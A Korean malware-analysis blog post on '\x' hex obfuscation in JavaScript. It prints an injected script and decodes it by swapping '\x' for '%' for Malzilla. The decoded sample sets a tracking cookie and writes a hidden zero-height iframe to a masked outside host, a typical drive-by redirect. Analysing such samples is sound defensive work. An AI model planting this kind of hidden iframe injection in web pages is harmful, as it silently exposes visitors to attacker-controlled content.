개요
두번째 16진수 난독화 형태는 "\x"를 구분자 기호로 사용하는 유형이다. \x 구분자 기호는 자바스크립트 엔진이 사용하는 16진수 인식 기호다. 이러한 이유로 자바스크립트 함수 까지도 난독화가 가능하다.
if (window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x6e\x62\x32\x32\x39\x3d') == -1) {
var aWdHMqss1 = new window["\x44\x61\x74\x65"]();
aWdHMqss1["\x73\x65\x74\x54\x69\x6d\x65"](aWdHMqss1["\x67\x65\x74\x54\x69\x6d\x65"]() + 12 * 60 * 60 * 1000);
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = '\x6e\x62\x32\x32\x39\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d' + aWdHMqss1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]();
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2f\x6a\x73\x2f\x63\x6f\x6f\x6b\x69\x65\x2e\x68\x74\x6d\x6c\x27 \x77\x69\x64\x74\x68\x3d\x27\x31\x31\x36\x27 \x68\x65\x69\x67\x68\x74\x3d\x27\x30\x27 \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x27\x30\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");
}분석
"%" 형태의 16진수 난독화라면 Malzilla에서 바로 풀리지만, "\x" 난독화는 바로 풀리지 않기 때문에 다음과 같이 "\x"를 "%"로 치환하여 난독화 해제를 할 수 있다.
if (window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"]["%69%6e%64%65%78%4f%66"]('%6e%62%32%32%39%3d') == -1) {
var aWdHMqss1 = new window["%44%61%74%65"]();
aWdHMqss1["%73%65%74%54%69%6d%65"](aWdHMqss1["%67%65%74%54%69%6d%65"]() + 12 * 60 * 60 * 1000);
window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"] = '%6e%62%32%32%39%3d%59%65%73%3b%70%61%74%68%3d%2f%3b%65%78%70%69%72%65%73%3d' + aWdHMqss1["%74%6f%47%4d%54%53%74%72%69%6e%67"]();
window["%64%6f%63%75%6d%65%6e%74"]["%77%72%69%74%65"]("%3c%69%66%72%61%6d%65 %73%72%63%3d%27%68%74%74%70%3a%2f%2f%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2f%6a%73%2f%63%6f%6f%6b%69%65%2e%68%74%6d%6c%27 %77%69%64%74%68%3d%27%31%31%36%27 %68%65%69%67%68%74%3d%27%30%27 %66%72%61%6d%65%62%6f%72%64%65%72%3d%27%30%27%3e%3c%2f%69%66%72%61%6d%65%3e");
}if (window["document"]["cookie"]["indexOf"]('nb229=') == -1) {
var aWdHMqss1 = new window["Date"]();
aWdHMqss1["setTime"](aWdHMqss1["getTime"]() + 12 * 60 * 60 * 1000);
window["document"]["cookie"] = 'nb229=Yes;path=/;expires=' + aWdHMqss1["toGMTString"]();
window["document"]["write"]("<iframe src="http://****************/js/cookie.html" width="116" height="0" frameborder="0">");
}반응형
'Information Security > Malware' 카테고리의 다른 글
| Deobfuscation 사이트 (0) | 2013.07.11 |
|---|---|
| Unicode Obfuscated (0) | 2013.06.24 |
| Vbscript Obfuscated (2) | 2013.06.19 |
| Kaixin Exploit Tookit(Yszz 0.13) (2) | 2013.06.13 |
| Gondad EK 최근 추세 (1) | 2013.06.12 |
